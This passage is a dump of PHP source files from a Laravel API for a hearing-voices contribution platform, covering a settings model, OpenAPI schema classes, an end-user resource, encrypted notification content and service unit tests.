"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Models;\n\nuse GoldSpecDigital\\LaravelEloquentUUID\\Database\\Eloquent\\Model;\nuse Illuminate\\Http\\JsonResponse;\n\nclass Setting extends Model\n{\n use Mutators\\SettingMutators;\n use Relationships\\SettingRelationships;\n use Scopes\\SettingScopes;\n\n const WITH_PRIVATE = true;\n const WITHOUT_PRIVATE = false;\n\n /**\n * Indicates if the IDs are UUIDs.\n *\n * @var bool\n */\n protected $keyIsUuid = false;\n\n /**\n * The primary key for the model.\n *\n * @var string\n */\n protected $primaryKey = 'key';\n\n /**\n * Indicates if the model should be timestamped.\n *\n * @var bool\n */\n public $timestamps = false;\n\n /**\n * The attributes that should be cast to native types.\n *\n * @var array\n */\n protected $casts = [\n 'is_private' => 'boolean',\n ];\n\n /**\n * @param bool $withPrivate\n * @return \\Illuminate\\Http\\JsonResponse\n */\n public static function toResponse(bool $withPrivate = false): JsonResponse\n {\n $settings = static::all();\n\n if (!$withPrivate) {\n $settings = $settings->reject->is_private;\n }\n\n $settings = $settings->mapWithKeys(function (Setting $setting): array {\n return [$setting->key => $setting->value];\n });\n\n return response()->json(['data' => $settings]);\n }\n}\n"
},
{
"alpha_fraction": 0.537214457988739,
"alphanum_fraction": 0.5379513502120972,
"avg_line_length": 18.66666603088379,
"blob_id": "7665492cb2ce039bf282de5af4c101c3f248339d",
"content_id": "1b9e4fef6174921d4b9f74592dc4e961b8aa8aff",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1357,
"license_type": "permissive",
"max_line_length": 60,
"num_lines": 69,
"path": "/app/Support/Enum.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Support;\n\nuse Illuminate\\Support\\Str;\nuse ReflectionClass;\n\nclass Enum\n{\n /**\n * @var string[]\n */\n protected $constants;\n\n /**\n * Enum constructor.\n *\n * @param object|string $class\n * @throws \\ReflectionException\n */\n public function __construct($class)\n {\n $reflectionClass = new ReflectionClass($class);\n $this->constants = $reflectionClass->getConstants();\n }\n\n /**\n * Gets the enums with.\n *\n * @param string $prefix\n * @return string[]\n */\n public function get(string $prefix): array\n {\n // Clone the constants array.\n $constants = $this->constants;\n\n // Filter only constants with prefix given.\n foreach ($constants as $name => $value) {\n if (Str::startsWith($name, \"{$prefix}_\")) {\n continue;\n }\n\n unset($constants[$name]);\n }\n\n return $constants;\n }\n\n /**\n * @param string $prefix\n * @return string[]\n */\n public function getValues(string $prefix): array\n {\n return array_values($this->get($prefix));\n }\n\n /**\n * @param string $prefix\n * @return string[]\n */\n public function getKeys(string $prefix): array\n {\n return array_keys($this->get($prefix));\n }\n}\n"
},
{
"alpha_fraction": 0.6091370582580566,
"alphanum_fraction": 0.6104061007499695,
"avg_line_length": 27.14285659790039,
"blob_id": "f88fddea6ae60e9ce6015b9d668da5b658b9cbf6",
"content_id": "f4ef6d560b3a5f00ff85940292053abdfb28febf",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 788,
"license_type": "permissive",
"max_line_length": 70,
"num_lines": 28,
"path": "/app/Docs/Schemas/File/FileDownloadUrlSchema.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Schemas\\File;\n\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Schema;\n\nclass FileDownloadUrlSchema extends Schema\n{\n /**\n * @param string|null $objectId\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Schema\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->type(static::TYPE_OBJECT)\n ->properties(\n Schema::string('token')\n ->format(Schema::FORMAT_UUID),\n Schema::string('download_url'),\n Schema::string('expires_at')\n ->format(Schema::FORMAT_DATE_TIME)\n );\n }\n}\n"
},
{
"alpha_fraction": 0.6146010160446167,
"alphanum_fraction": 0.6162987947463989,
"avg_line_length": 18.633333206176758,
"blob_id": "68159435bacf7ee5d359f4f069447ecd957cb782",
"content_id": "d5297f1ced93bef6ae341d1e66b3f3133fe05ad9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 589,
"license_type": "permissive",
"max_line_length": 59,
"num_lines": 30,
"path": "/app/Listeners/EventSubscriber.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Listeners;\n\nuse Illuminate\\Events\\Dispatcher;\nuse Illuminate\\Foundation\\Bus\\DispatchesJobs;\n\nabstract class EventSubscriber\n{\n use DispatchesJobs;\n\n /**\n * @param \\Illuminate\\Events\\Dispatcher $events\n */\n public function subscribe(Dispatcher $events): void\n {\n $class = static::class;\n\n foreach ($this->mapping() as $event => $handler) {\n $events->listen($event, \"{$class}@{$handler}\");\n }\n }\n\n /**\n * @return string[]\n */\n abstract protected function mapping(): array;\n}\n"
},
{
"alpha_fraction": 0.6186840534210205,
"alphanum_fraction": 0.6233999729156494,
"avg_line_length": 35.80165100097656,
"blob_id": "1f51c86e07064be1a0f5447911c6260e7838ebc8",
"content_id": "a9f301de0137eed12c8d1d5ba9ab3c01f5020cf3",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 4453,
"license_type": "permissive",
"max_line_length": 105,
"num_lines": 121,
"path": "/app/Http/Resources/EndUserResource.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Resources;\n\nuse Illuminate\\Http\\Resources\\Json\\JsonResource;\n\n/**\n * @property \\App\\Models\\EndUser $resource\n */\nclass EndUserResource extends JsonResource\n{\n /**\n * Transform the resource into an array.\n *\n * @param \\Illuminate\\Http\\Request $request\n * @return array\n */\n public function toArray($request): array\n {\n return [\n 'id' => $this->resource->id,\n 'email' => $this->resource->user->email,\n 'country' => $this->resource->country,\n 'birth_year' => $this->resource->birth_year,\n 'gender' => $this->resource->gender,\n 'ethnicity' => $this->resource->ethnicity,\n 'contributions_count' => $this->getContributionsCount(),\n 'public_contributions_count' => $this->getPublicContributionsCount(),\n 'private_contributions_count' => $this->getPrivateContributionsCount(),\n 'in_review_contributions_count' => $this->getInReviewContributionsCount(),\n 'changes_requested_contributions_count' => $this->getChangesRequestedContributionsCount(),\n 'gdpr_consented_at' => $this->resource->gdpr_consented_at->toIso8601String(),\n 'email_verified_at' => optional($this->resource->user->email_verified_at)->toIso8601String(),\n 'created_at' => $this->resource->user->created_at->toIso8601String(),\n 'updated_at' => $this->resource->user->updated_at->toIso8601String(),\n 'deleted_at' => optional($this->resource->user->deleted_at)->toIso8601String(),\n ];\n }\n\n /**\n * First attempts to use the relationship count attribute if appended.\n * Then attempt to use the count of the loaded relationships.\n * Finally resorts to querying the database for the count.\n *\n * @return int\n */\n protected function getContributionsCount(): int\n {\n return $this->contributions_count ?? (int)$this->whenLoaded(\n 'contributions',\n count($this->resource->contributions),\n $this->resource->contributions()->count()\n );\n }\n\n /**\n * First attempts to use the relationship count attribute if appended.\n * Then attempt to use the count of the loaded relationships.\n * Finally resorts to querying the database for the count.\n *\n * @return int\n */\n protected function getPublicContributionsCount(): int\n {\n return $this->public_contributions_count ?? (int)$this->whenLoaded(\n 'publicContributions',\n count($this->resource->publicContributions),\n $this->resource->publicContributions()->count()\n );\n }\n\n /**\n * First attempts to use the relationship count attribute if appended.\n * Then attempt to use the count of the loaded relationships.\n * Finally resorts to querying the database for the count.\n *\n * @return int\n */\n protected function getPrivateContributionsCount(): int\n {\n return $this->private_contributions_count ?? (int)$this->whenLoaded(\n 'privateContributions',\n count($this->resource->privateContributions),\n $this->resource->privateContributions()->count()\n );\n }\n\n /**\n * First attempts to use the relationship count attribute if appended.\n * Then attempt to use the count of the loaded relationships.\n * Finally resorts to querying the database for the count.\n *\n * @return int\n */\n protected function getInReviewContributionsCount(): int\n {\n return $this->in_review_contributions_count ?? 
(int)$this->whenLoaded(\n 'inReviewContributions',\n count($this->resource->inReviewContributions),\n $this->resource->inReviewContributions()->count()\n );\n }\n\n /**\n * First attempts to use the relationship count attribute if appended.\n * Then attempt to use the count of the loaded relationships.\n * Finally resorts to querying the database for the count.\n *\n * @return int\n */\n protected function getChangesRequestedContributionsCount(): int\n {\n return $this->changes_requested_contributions_count ?? (int)$this->whenLoaded(\n 'changesRequestedContributions',\n count($this->resource->changesRequestedContributions),\n $this->resource->changesRequestedContributions()->count()\n );\n }\n}\n"
},
{
"alpha_fraction": 0.6087912321090698,
"alphanum_fraction": 0.6109890341758728,
"avg_line_length": 17.200000762939453,
"blob_id": "39e2180cba928cb56e8f1353fa8e74f6c9a59914",
"content_id": "cb83503cec4f1032b2d2d444f0491b1d0c4f53d6",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 455,
"license_type": "permissive",
"max_line_length": 64,
"num_lines": 25,
"path": "/app/Models/Mutators/NotificationMutators.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Models\\Mutators;\n\ntrait NotificationMutators\n{\n /**\n * @param string $content\n * @return string\n */\n public function getContentAttribute(string $content): string\n {\n return decrypt($content);\n }\n\n /**\n * @param string $content\n */\n public function setContentAttribute(string $content): void\n {\n $this->attributes['content'] = encrypt($content);\n }\n}\n"
},
{
"alpha_fraction": 0.6146853566169739,
"alphanum_fraction": 0.6167151927947998,
"avg_line_length": 34.08049392700195,
"blob_id": "a0b867dfb90a6847def66f393005413b19cb74e1",
"content_id": "f0d29886f4504a53d835f1c6160a581461577770",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 11331,
"license_type": "permissive",
"max_line_length": 93,
"num_lines": 323,
"path": "/tests/Unit/Services/ContributionServiceTest.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace Tests\\Unit\\Services;\n\nuse App\\Events\\Contribution\\ContributionApproved;\nuse App\\Events\\Contribution\\ContributionCreated;\nuse App\\Events\\Contribution\\ContributionDeleted;\nuse App\\Events\\Contribution\\ContributionRejected;\nuse App\\Events\\Contribution\\ContributionUpdated;\nuse App\\Models\\Contribution;\nuse App\\Models\\EndUser;\nuse App\\Models\\Tag;\nuse App\\Services\\ContributionService;\nuse Illuminate\\Support\\Facades\\Date;\nuse Illuminate\\Support\\Facades\\Event;\nuse Tests\\TestCase;\n\nclass ContributionServiceTest extends TestCase\n{\n /** @test */\n public function it_creates_a_contribution_tag_and_contribution_record(): void\n {\n /** @var \\App\\Services\\ContributionService $contributionService */\n $contributionService = resolve(ContributionService::class);\n\n /** @var \\App\\Models\\EndUser $endUser */\n $endUser = factory(EndUser::class)->create();\n\n /** @var \\App\\Models\\Tag $tag */\n $tag = factory(Tag::class)->create();\n\n $contribution = $contributionService->create([\n 'end_user_id' => $endUser->id,\n 'content' => 'Lorem ipsum',\n 'status' => Contribution::STATUS_PRIVATE,\n 'tags' => [$tag->id],\n ]);\n\n $this->assertDatabaseHas('contributions', ['id' => $contribution->id]);\n $this->assertDatabaseHas('contribution_tag', [\n 'contribution_id' => $contribution->id,\n 'tag_id' => $tag->id,\n ]);\n $this->assertEquals($endUser->id, $contribution->end_user_id);\n $this->assertEquals('Lorem ipsum', $contribution->content);\n $this->assertEquals(Contribution::STATUS_PRIVATE, $contribution->status);\n $this->assertEquals([$tag->id], $contribution->tags->pluck('id')->toArray());\n }\n\n /** @test */\n public function it_dispatches_an_event_when_created(): void\n {\n Event::fake([ContributionCreated::class]);\n\n /** @var \\App\\Services\\ContributionService $contributionService */\n $contributionService = resolve(ContributionService::class);\n\n /** @var \\App\\Models\\EndUser $endUser */\n $endUser = factory(EndUser::class)->create();\n\n $contribution = $contributionService->create([\n 'end_user_id' => $endUser->id,\n 'content' => 'Lorem ipsum',\n 'status' => Contribution::STATUS_PRIVATE,\n 'tags' => [],\n ]);\n\n Event::assertDispatched(\n ContributionCreated::class,\n function (ContributionCreated $event) use ($contribution): bool {\n return $event->getContribution()->is($contribution);\n }\n );\n }\n\n /** @test */\n public function it_updates_and_changes_status_from_public_to_in_review(): void\n {\n /** @var \\App\\Services\\ContributionService $contributionService */\n $contributionService = resolve(ContributionService::class);\n\n $contribution = factory(Contribution::class)->create();\n\n $contribution = $contributionService->update($contribution, []);\n\n $this->assertEquals(Contribution::STATUS_IN_REVIEW, $contribution->status);\n }\n\n /** @test */\n public function it_updates_and_leaves_status_as_private(): void\n {\n /** @var \\App\\Services\\ContributionService $contributionService */\n $contributionService = resolve(ContributionService::class);\n\n $contribution = factory(Contribution::class)\n ->state(Contribution::STATUS_PRIVATE)\n ->create();\n\n $contribution = $contributionService->update($contribution, []);\n\n $this->assertEquals(Contribution::STATUS_PRIVATE, $contribution->status);\n }\n\n /** @test */\n public function it_updates_and_leaves_status_as_in_review(): void\n {\n /** @var \\App\\Services\\ContributionService $contributionService */\n $contributionService = 
resolve(ContributionService::class);\n\n $contribution = factory(Contribution::class)\n ->state(Contribution::STATUS_IN_REVIEW)\n ->create();\n\n $contribution = $contributionService->update($contribution, []);\n\n $this->assertEquals(Contribution::STATUS_IN_REVIEW, $contribution->status);\n }\n\n /** @test */\n public function it_updates_and_changes_status_from_changes_requested_to_in_review(): void\n {\n /** @var \\App\\Services\\ContributionService $contributionService */\n $contributionService = resolve(ContributionService::class);\n\n $contribution = factory(Contribution::class)\n ->state(Contribution::STATUS_CHANGES_REQUESTED)\n ->create();\n\n $contribution = $contributionService->update($contribution, []);\n\n $this->assertEquals(Contribution::STATUS_IN_REVIEW, $contribution->status);\n }\n\n /** @test */\n public function it_updates_tags(): void\n {\n /** @var \\App\\Services\\ContributionService $contributionService */\n $contributionService = resolve(ContributionService::class);\n\n /** @var \\App\\Models\\Contribution $contribution */\n $contribution = factory(Contribution::class)\n ->state(Contribution::STATUS_IN_REVIEW)\n ->create();\n\n $tag1 = factory(Tag::class)->create();\n $tag2 = factory(Tag::class)->create();\n\n $contribution->tags()->sync([$tag1->id]);\n\n $contribution = $contributionService->update($contribution, [\n 'tags' => [$tag2->id],\n ]);\n\n $this->assertDatabaseMissing('contribution_tag', [\n 'contribution_id' => $contribution->id,\n 'tag_id' => $tag1->id,\n ]);\n $this->assertDatabaseHas('contribution_tag', [\n 'contribution_id' => $contribution->id,\n 'tag_id' => $tag2->id,\n ]);\n }\n\n /** @test */\n public function it_dispatches_an_event_when_updated(): void\n {\n Event::fake([ContributionUpdated::class]);\n\n /** @var \\App\\Services\\ContributionService $contributionService */\n $contributionService = resolve(ContributionService::class);\n\n $contribution = factory(Contribution::class)->create();\n\n $contribution = $contributionService->update($contribution, []);\n\n Event::assertDispatched(\n ContributionUpdated::class,\n function (ContributionUpdated $event) use ($contribution): bool {\n return $event->getContribution()->is($contribution);\n }\n );\n }\n\n /** @test */\n public function it_deletes_the_contribution_tag_and_contribution_records(): void\n {\n /** @var \\App\\Services\\ContributionService $contributionService */\n $contributionService = resolve(ContributionService::class);\n\n /** @var \\App\\Models\\Contribution $contribution */\n $contribution = factory(Contribution::class)->create();\n\n /** @var \\App\\Models\\Tag $tag */\n $tag = factory(Tag::class)->create();\n\n $contribution->tags()->sync([$tag->id]);\n\n $contributionService->delete($contribution);\n\n $this->assertDatabaseMissing('contributions', ['id' => $contribution->id]);\n $this->assertDatabaseMissing('contribution_tag', [\n 'contribution_id' => $contribution->id,\n 'tag_id' => $tag->id,\n ]);\n }\n\n /** @test */\n public function it_dispatches_an_event_when_deleted(): void\n {\n Event::fake([ContributionDeleted::class]);\n\n /** @var \\App\\Services\\ContributionService $contributionService */\n $contributionService = resolve(ContributionService::class);\n\n /** @var \\App\\Models\\Contribution $contribution */\n $contribution = factory(Contribution::class)->create();\n\n $contributionService->delete($contribution);\n\n Event::assertDispatched(\n ContributionDeleted::class,\n function (ContributionDeleted $event) use ($contribution): bool {\n return 
$event->getContribution()->is($contribution);\n }\n );\n }\n\n /** @test */\n public function it_approves_a_contribution(): void\n {\n /** @var \\App\\Services\\ContributionService $contributionService */\n $contributionService = resolve(ContributionService::class);\n\n /** @var \\App\\Models\\Contribution $contribution */\n $contribution = factory(Contribution::class)\n ->state(Contribution::STATUS_CHANGES_REQUESTED)\n ->create();\n\n $now = Date::now()->addMonth();\n Date::setTestNow($now);\n\n $contribution = $contributionService->approve($contribution);\n\n $this->assertEquals(Contribution::STATUS_PUBLIC, $contribution->status);\n $this->assertEquals(null, $contribution->changes_requested);\n $this->assertEquals(\n $now->toIso8601String(),\n $contribution->status_last_updated_at->toIso8601String()\n );\n }\n\n /** @test */\n public function it_dispatches_an_event_when_approved(): void\n {\n Event::fake([ContributionApproved::class]);\n\n /** @var \\App\\Services\\ContributionService $contributionService */\n $contributionService = resolve(ContributionService::class);\n\n /** @var \\App\\Models\\Contribution $contribution */\n $contribution = factory(Contribution::class)\n ->state(Contribution::STATUS_CHANGES_REQUESTED)\n ->create();\n\n $contribution = $contributionService->approve($contribution);\n\n Event::assertDispatched(\n ContributionApproved::class,\n function (ContributionApproved $event) use ($contribution): bool {\n return $event->getContribution()->is($contribution);\n }\n );\n }\n\n /** @test */\n public function it_rejects_a_contribution(): void\n {\n /** @var \\App\\Services\\ContributionService $contributionService */\n $contributionService = resolve(ContributionService::class);\n\n /** @var \\App\\Models\\Contribution $contribution */\n $contribution = factory(Contribution::class)\n ->state(Contribution::STATUS_IN_REVIEW)\n ->create();\n\n $now = Date::now()->addMonth();\n Date::setTestNow($now);\n\n $contribution = $contributionService->reject($contribution, 'Lorem ipsum');\n\n $this->assertEquals(Contribution::STATUS_CHANGES_REQUESTED, $contribution->status);\n $this->assertEquals('Lorem ipsum', $contribution->changes_requested);\n $this->assertEquals(\n $now->toIso8601String(),\n $contribution->status_last_updated_at->toIso8601String()\n );\n }\n\n /** @test */\n public function it_dispatches_an_event_when_rejected(): void\n {\n Event::fake([ContributionRejected::class]);\n\n /** @var \\App\\Services\\ContributionService $contributionService */\n $contributionService = resolve(ContributionService::class);\n\n /** @var \\App\\Models\\Contribution $contribution */\n $contribution = factory(Contribution::class)\n ->state(Contribution::STATUS_IN_REVIEW)\n ->create();\n\n $contribution = $contributionService->reject($contribution, 'Lorem ipsum');\n\n Event::assertDispatched(\n ContributionRejected::class,\n function (ContributionRejected $event) use ($contribution): bool {\n return $event->getContribution()->is($contribution);\n }\n );\n }\n}\n"
},
{
"alpha_fraction": 0.6899999976158142,
"alphanum_fraction": 0.699999988079071,
"avg_line_length": 9,
"blob_id": "cf2215f117c22d4aae992633ca13d61ab866f1b1",
"content_id": "ba65b9d57d95e34405d4099bd30927cf5d6b9b82",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 100,
"license_type": "permissive",
"max_line_length": 30,
"num_lines": 10,
"path": "/app/Models/Mutators/FileTokenMutators.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Models\\Mutators;\n\ntrait FileTokenMutators\n{\n //\n}\n"
},
{
"alpha_fraction": 0.5983999967575073,
"alphanum_fraction": 0.6000000238418579,
"avg_line_length": 15.447368621826172,
"blob_id": "af4387000f09ba7563b9122639197f5b63e3a637",
"content_id": "29bb9e16d56ac96bc7cbfd8584203d76c93734bb",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 625,
"license_type": "permissive",
"max_line_length": 46,
"num_lines": 38,
"path": "/app/Events/Audit/AuditCreated.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Events\\Audit;\n\nuse App\\Models\\Audit;\nuse Illuminate\\Foundation\\Events\\Dispatchable;\nuse Illuminate\\Queue\\SerializesModels;\n\nclass AuditCreated\n{\n use Dispatchable;\n use SerializesModels;\n\n /**\n * @var \\App\\Models\\Audit\n */\n protected $audit;\n\n /**\n * AuditCreated constructor.\n *\n * @param \\App\\Models\\Audit $audit\n */\n public function __construct(Audit $audit)\n {\n $this->audit = $audit;\n }\n\n /**\n * @return \\App\\Models\\Audit\n */\n public function getAudit(): Audit\n {\n return $this->audit;\n }\n}\n"
},
{
"alpha_fraction": 0.5377969741821289,
"alphanum_fraction": 0.542116641998291,
"avg_line_length": 32.07143020629883,
"blob_id": "c6b98f52715c6efc613c3a13d9211840af700a8c",
"content_id": "ca62ca7f966c3095f8ec303a47c3218f714839f1",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1389,
"license_type": "permissive",
"max_line_length": 108,
"num_lines": 42,
"path": "/app/Docs/Schemas/Contribution/StoreContributionSchema.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Schemas\\Contribution;\n\nuse App\\Models\\Contribution;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Schema;\n\nclass StoreContributionSchema extends Schema\n{\n /**\n * @param string|null $objectId\n * @throws \\GoldSpecDigital\\ObjectOrientedOAS\\Exceptions\\InvalidArgumentException\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Schema\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->type(static::TYPE_OBJECT)\n ->required(\n 'content',\n 'status',\n 'tags'\n )\n ->properties(\n Schema::string('content')\n ->maxLength(10000),\n Schema::string('status')\n ->enum(Contribution::STATUS_IN_REVIEW, Contribution::STATUS_PRIVATE)\n ->description('Use `in_review` for public consumption and `private` for personal use.'),\n Schema::array('tags')\n ->items(\n Schema::object()->properties(\n Schema::string('id')\n ->format(Schema::FORMAT_UUID)\n )\n )\n );\n }\n}\n"
},
{
"alpha_fraction": 0.6261802315711975,
"alphanum_fraction": 0.6266094446182251,
"avg_line_length": 28.125,
"blob_id": "cc06c9120375f10f479597e83c50be5c29b2220d",
"content_id": "c54f602389e5896b9c186d4b8fa23670e0d906d8",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 2330,
"license_type": "permissive",
"max_line_length": 74,
"num_lines": 80,
"path": "/tests/Unit/Services/ExportServiceTest.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace Tests\\Unit\\Services;\n\nuse App\\Events\\Export\\ExportRequested;\nuse App\\Exceptions\\ExporterNotFoundException;\nuse App\\Exceptions\\InvalidExporterException;\nuse App\\Models\\Admin;\nuse App\\Models\\Export;\nuse App\\Services\\ExportService;\nuse Illuminate\\Support\\Facades\\Event;\nuse Tests\\TestCase;\n\nclass ExportServiceTest extends TestCase\n{\n /** @test */\n public function it_creates_an_export_for_a_valid_export(): void\n {\n /** @var \\App\\Models\\Admin $admin */\n $admin = factory(Admin::class)->create();\n\n /** @var \\App\\Services\\ExportService $exportService */\n $exportService = resolve(ExportService::class);\n\n $export = $exportService->create('all', $admin);\n\n $this->assertInstanceOf(Export::class, $export);\n }\n\n /** @test */\n public function it_throws_exception_for_missing_exporter(): void\n {\n $this->expectException(ExporterNotFoundException::class);\n\n /** @var \\App\\Models\\Admin $admin */\n $admin = factory(Admin::class)->create();\n\n /** @var \\App\\Services\\ExportService $exportService */\n $exportService = resolve(ExportService::class);\n\n $exportService->create('missing', $admin);\n }\n\n /** @test */\n public function it_throws_exception_for_invalid_exporter(): void\n {\n $this->expectException(InvalidExporterException::class);\n\n /** @var \\App\\Models\\Admin $admin */\n $admin = factory(Admin::class)->create();\n\n /** @var \\App\\Services\\ExportService $exportService */\n $exportService = resolve(ExportService::class);\n\n $exportService->create('test', $admin, 'Tests\\\\Stubs\\\\Exporters');\n }\n\n /** @test */\n public function it_dispatches_an_event_when_requested(): void\n {\n Event::fake([ExportRequested::class]);\n\n /** @var \\App\\Models\\Admin $admin */\n $admin = factory(Admin::class)->create();\n\n /** @var \\App\\Services\\ExportService $exportService */\n $exportService = resolve(ExportService::class);\n\n $export = $exportService->create('all', $admin);\n\n Event::assertDispatched(\n ExportRequested::class,\n function (ExportRequested $event) use ($export): bool {\n return $event->getExport()->is($export);\n }\n );\n }\n}\n"
},
{
"alpha_fraction": 0.6548410654067993,
"alphanum_fraction": 0.6555801630020142,
"avg_line_length": 33.69230651855469,
"blob_id": "52468902bd2152d0ece812b3d114aac11138d822",
"content_id": "2c1fd4b108679300ca9f61a9d476f5cae84bb5fc",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1353,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 39,
"path": "/app/Docs/Paths/EndUsers/EndUsersNestedPath.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Paths\\EndUsers;\n\nuse App\\Docs\\Operations\\EndUser\\DestroyEndUserOperation;\nuse App\\Docs\\Operations\\EndUser\\ShowEndUserOperation;\nuse App\\Docs\\Operations\\EndUser\\UpdateEndUserOperation;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Parameter;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\PathItem;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Schema;\n\nclass EndUsersNestedPath extends PathItem\n{\n /**\n * @param string|null $objectId\n * @throws \\GoldSpecDigital\\ObjectOrientedOAS\\Exceptions\\InvalidArgumentException\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\PathItem\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->route('/end-users/{end_user}')\n ->parameters(\n Parameter::path()\n ->name('end_user')\n ->description('The ID of the end user')\n ->schema(Schema::string()->format(Schema::FORMAT_UUID))\n ->required()\n )\n ->operations(\n ShowEndUserOperation::create(),\n UpdateEndUserOperation::create(),\n DestroyEndUserOperation::create()\n );\n }\n}\n"
},
{
"alpha_fraction": 0.5570881366729736,
"alphanum_fraction": 0.5624520778656006,
"avg_line_length": 32.46154022216797,
"blob_id": "11040a8d92b8c20c41fab5a9c9dc2ce18250e5f7",
"content_id": "1b4de78710e3d868b50896470bef7c7631b50a44",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1305,
"license_type": "permissive",
"max_line_length": 105,
"num_lines": 39,
"path": "/app/Docs/Schemas/EndUser/UpdateEndUserSchema.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Schemas\\EndUser;\n\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Schema;\nuse Illuminate\\Support\\Facades\\Config;\nuse Illuminate\\Support\\Facades\\Date;\n\nclass UpdateEndUserSchema extends Schema\n{\n /**\n * @param string|null $objectId\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Schema\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->type(static::TYPE_OBJECT)\n ->properties(\n Schema::string('email')\n ->maxLength(255),\n Schema::string('password')\n ->maxLength(255),\n Schema::string('country')\n ->nullable(),\n Schema::integer('birth_year')\n ->minimum(Date::today()->year - Config::get('connecting_voices.age_requirement.max'))\n ->maximum(Date::today()->year - Config::get('connecting_voices.age_requirement.min'))\n ->nullable(),\n Schema::string('gender')\n ->nullable(),\n Schema::string('ethnicity')\n ->nullable()\n );\n }\n}\n"
},
{
"alpha_fraction": 0.5316927433013916,
"alphanum_fraction": 0.5324384570121765,
"avg_line_length": 32.525001525878906,
"blob_id": "80c3e769d2473ce2ed8cca5ec7a6a73a9424d8b0",
"content_id": "d27a57f22d41acddd66514e64e5226eb9f9fad37",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1341,
"license_type": "permissive",
"max_line_length": 93,
"num_lines": 40,
"path": "/app/Docs/Schemas/PaginationSchema.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
